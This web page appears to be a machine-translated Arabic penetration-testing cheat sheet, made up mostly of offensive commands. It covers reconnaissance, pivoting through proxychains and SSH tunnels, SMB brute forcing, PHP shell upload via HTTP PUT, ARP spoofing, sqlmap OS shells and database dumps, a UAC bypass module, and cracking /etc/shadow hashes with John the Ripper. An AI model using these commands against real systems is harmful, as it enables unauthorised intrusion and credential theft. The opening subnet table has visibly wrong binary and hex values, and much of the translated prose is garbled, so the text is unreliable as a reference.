الصفحة الرئيسية>موارد بناء الموقع>بيانات الموقع
تنزيل

مرحبا بكم في علم الأسلوب الخماسي

الشبكات

تدوين القطع قناع صافي عرافة تمثيل ثنائي عدد المضيفين
/0 0.0.0.0 0x00000000 00000000 00000000 00000000 00000000 4294967296
/1 128.0.0.0 0x80000000 10000000 00000000 00000000 00000000 2147483648
/2 192.0.0.0 0xC0000000 11000000 00000000 00000000 00000000 1073741824
/3 224.0.0.0 0xE0000000 11100000 00000000 00000000 00000000 536870912
/4 240.0.0.0 0xF0000000 11110000 00000000 00000000 00000000 268435456
/5 248.0.0.0 0xF8000000 11111000 00000000 00000000 00000000 134217728
/6 252.0.0.0 0xFC000000 11111100 00000000 00000000 00000000 67108864
/7 254.0.0.0 0xfe000000 11111110 00000000 00000000 00000000 33554432
/8 255.0.0.0 0xFF000000 111111111 00000000 00000000 00000000 16777216
/9 255.128.0.0 0xFF800000 11111111100000 00000000 00000000 8388608
/10 255.192.0.0 0xFFC00000 11111111 11000000 00000000 00000000 4194304
/11 255.224.0.0 0xffe00000 11111111 11100000 00000000 00000000 2097152
/12 255.240.0.0 0xFFF00000 1111111111110000 00000000 00000000 1048576
/13 255.248.0.0 0xFFF80000 1111111111111000 00000000 00000000 524288
/14 255.252.0.0 0xFFFC0000 111111111111100 00000000 00000000 262144
/15 255.254.0.0 0xfffe0000 1111111111111110 00000000 00000000 131072
/16 255.255.0.0 0xFFFF0000 1111111111111111 00000000 00000000 65536
/17 255.255.128.0 0xffff8000 1111111111111111100000 00000000 32768
/18 255.255.192.0 0xFFFFC000 111111111111111 11000000 00000000 16384
/19 255.255.224.0 0xffffe000 111111111111111 11100000 00000000 8192
/20 255.255.240.0 0xffffff000 111111111111111 11110000 00000000 4096
/21 255.255.248.0 0xfffff800 11111111111111111111000 00000000 2048
/22 255.255.252.0 0xFFFFFC00 11111111111111111111100 00000000 1024
/23 255.255.254.0 0xfffffe00 11111111111111111111110 00000000 512
/24 255.255.255.0 0xffffff00 11111111111111111111111 00000000 256
/25 255.255.255.128 0xffffff80 11111111111111111111111 10000000 128
/26 255.255.255.192 0xffffffc0 1111111111111111111111 11000000 64
/27 255.255.255.224 0xffffffe0 11111111111111111111111 11100000 32
/28 255.255.255.240 0xfffffff0 11111111 11111111 111111111110000 16
/29 255.255.255.248 0xfffffff8 1111111111111111 111111111111000 8
/30 255.255.255.252 0xfffffffc 111111111111111111111111111100 4
/31 255.255.255.254 0xfffffffe 11111111 11111111 111111111111110 2
/32 255.255.255.255 0xffffffff 11111111111111111111111 11111111 1

إعادة التحليل والتحليل

  • تحديد خادم الويب والتقنيات

  • النطاقات الفرعية Bruteforce

    • Sublist3r
    • طرق
    • جمع
    • دون
    • Dnsrecon

  • دليل التعداد

    • ديرب
    • gobuster
    • DirSearch
    • ffuf
    • نيكو

  • ابحث عن المستخدمين ، ورسائل البريد الإلكتروني التي تم تسريبها ، ومعرفات ، إلخ

  • حاول دائمًا /robots..txt،/sitemap.xml ،

  • Google Dorking

    site: يمكنك استخدام هذا الأمر لتضمين نتائج فقط على اسم مضيف معين.

    intitle: مرشحات الأمر وفقًا لصفحة العنوان.

    inurl: على غرار intitle ولكن يعمل على عنوان URL لمورد.

    filetype: هذه المرشحات باستخدام ملحق ملف المورد.

    AND, OR, &, | استخدام المشغلين المنطقيين لدمج التعبيرات.

  • عناوين URL Wayback

التوجيه/المحور

ip route - prints the routing table for the host you are on

ip route add ROUTETO via ROUTEFROM - add a route to a new network if on a switched network and you need to pivot

تعداد الشبكة

  • باستخدام المواد الموجودة على الجهاز. على سبيل المثال ، ملف المضيفين أو ذاكرة التخزين المؤقت

  • باستخدام الأدوات المثبتة مسبقًا

  • باستخدام الأدوات المترجمة بشكل ثابت

  • باستخدام تقنيات البرمجة النصية

  • استخدام الأدوات المحلية من خلال الوكيل

    arp -a (can be used to check the arp cache of the machine)

    nano /etc/hosts (on linux, static mappings may be found)

    /etc/resolv.conf (on Linux, may identify any local DNS servers, which may be misconfigured to allow a DNS zone transfer attack)

    nmcli dev show (reading resolve.conf)

    C:WindowsSystem32driversetchosts (On windows)

    ipconfig /all (Check the DNS servers for an interface)

Proxychains 

 - /etc/proxychains.conf 
[proxylist] & [proxy_dns]

sock4[5] 127.0.0.1 <port>

proxychains telnet 172.16.0.100 23

IP 

ip route add 192.168.72.23 via 10.10.10.10(VPN Gateway)

شبكة 

ip route add 192.168.72.0/24 via 10.10.10.10(VPN Gateway)

التعداد (مسح ping)

fping -a -g 10.10.10.0/24 2>/dev/null

nmap -sn 10.10.10.0/24

فحص NMAP (كامل)

nmap -sC -sV -p- <IP>

NMAP Scan (UDP Quick)

nmap -sU -sV <IP>

تطبيقات الويب

لافتة الاستيلاء 

 nc -v 10.10.10.10 port
HEAD / HTTP/1.0

OpenSSL لخدمات HTTPS 

 openssl s_client -connect 10.10.10.10:443
HEAD / HTTP/1.0

httprint 

 httprint -P0 -h 10.10.10.10 -s /path/to/signaturefile.txt

أفعال http 

 GET, POST, HEAD, PUT, DELETE, OPTIONS

استخدم VERB Optires لمعرفة ما إذا كانت الأفعال الأخرى يمكن أن تكون متوفرة على خادم الويب 

 nc 10.10.10.10 80
OPTIONS / HTPP/1.0

يمكنك استخدام أفعال HTTP لتحميل قذيفة PHP. ابحث عن طول المحتوى ، ثم استخدم وضع الغلاف. تأكد من تضمين حجم الحمولة النافعة عند استخدام أمر PUT. 

 wc -m shell.php
x shell.php

PUT /shell.php
Content-type: text/html
Content-length: x
Directory and File Scanning

يشارك Windows باستخدام الجلسات الفارغة والاستغلال

nmblookup -A <target IP> - netbios على عميل TCP/IP المستخدمة في البحث عن أسماء netbios

يعرض nbtstat -A <IP> - (Windows) بروتوكولات SATISTICS واتصالات TCP/IP الحالية باستخدام NBT

net view <target ip> - أداة لإدارة خوادم Samba و CIFS عن بعد

exlpoit/windows/localbypassuac - (Metasploit Module) Windows UAC Protection Bypass 

 <20> record tells us that the file sharing service is up and running

Enum4linux 

 enum4linux -a 10.10.10.10

enum4linux -S(enumerate shares) X.X.X.X

enum4linux -U(enumerate users) X.X.X.X

enum4linux -P(check password policy) X.X.X.X

نصوص NMAP لـ SMB 

 nmap -script=smb-enum-shares

nmap -script=smb-enum-users

nmap -script=smb-brute

nmap --script smb-check-vulns.nse --script-args=unsafe-1 

exlpoit/windows/localbypassuac

باستخدام سامبا 

 -L - allows you to look at what services are avaliable on a target. prepend //<IP ADDRESS>

-N - forces the tool to not ask for a password 

smbclient [-U username] [-P password or -N for no password] -L \\X.X.X.X

smbclient [-U username] [-P password or -N for no password] \\X.X.X.X\share

smbclient -L //10.10.10.10 -N (list shares)

smbclient //10.10.10.10/share -N (mount share)

smbclient //X.X.X.X/IPC$ -N

arpspoofing 

 echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i <interface> -t <target> -r <host>

SQLMAP 

 sqlmap -u <URL> -p <injection parameter> [options]

sqlmap -u http://10.10.10.10 -p parameter

sqlmap -u http://10.10.10.10  --data POSTstring -p parameter

sqlmap -u http://10.10.10.10 --os-shell

sqlmap -u http://10.10.10.10 --dump

--cookie (specifiying cookie)

أوامر SQL 

 update <table> set <parameter>="yes" where <Parameter>="<data";

هجمات كلمة المرور

unshadow

هذا يعد ملفًا للاستخدام مع جون ذا ريبر 

 unshadow passwd shadow > unshadow

تكسير التجزئة 

 john -wordlist /path/to/wordlist -users=users.txt hashfile

SCP - نقل الملفات بشكل آمن من الجهاز إلى الجهاز 

 scp <user>@<ip>/etc/passwd .

حقن SQL

user() يعيد اسم المستخدم حاليًا باستخدام قاعدة البيانات

substring() إرجاع فرعية من جدال معين. يستغرق ثلاثة معلمات: سلسلة الإدخال ، وموضع السلسلة الفرعية وطولها

ميناء fowarding

Use of Metasploit - (portfwd) -h

 Port forwarding is accomplished with the -L switch, which creates a link to a Local port.

ssh -L 8000:172.16.0.10:80 [email protected] -fN

-خلفيات القذيفة ، -n تخبر SSH أنها لا تحتاج إلى تنفيذ أي أوامر -فقط قم بإعداد الاتصال 

 Proxies are made using the -D switch, for example: -D 1337

ssh -D 1337 [email protected] -fN

يستخدم هذا مرة أخرى مفاتيح -FN إلى خلفية القشرة. يعد اختيار المنفذ 1337 تعسفيًا تمامًا - كل ما يهم هو أن يكون المنفذ متاحًا وإعداده بشكل صحيح في ملف تكوين ProxyChains (أو المكافئ). إن إعداد هذا الوكيل سيسمح لنا بتوجيه جميع حركة المرور لدينا إلى الشبكة المستهدفة.

يوسع
معلومات إضافية
تطبيقات ذات صلة
نوصي لك
أخبار ذات صلة الكل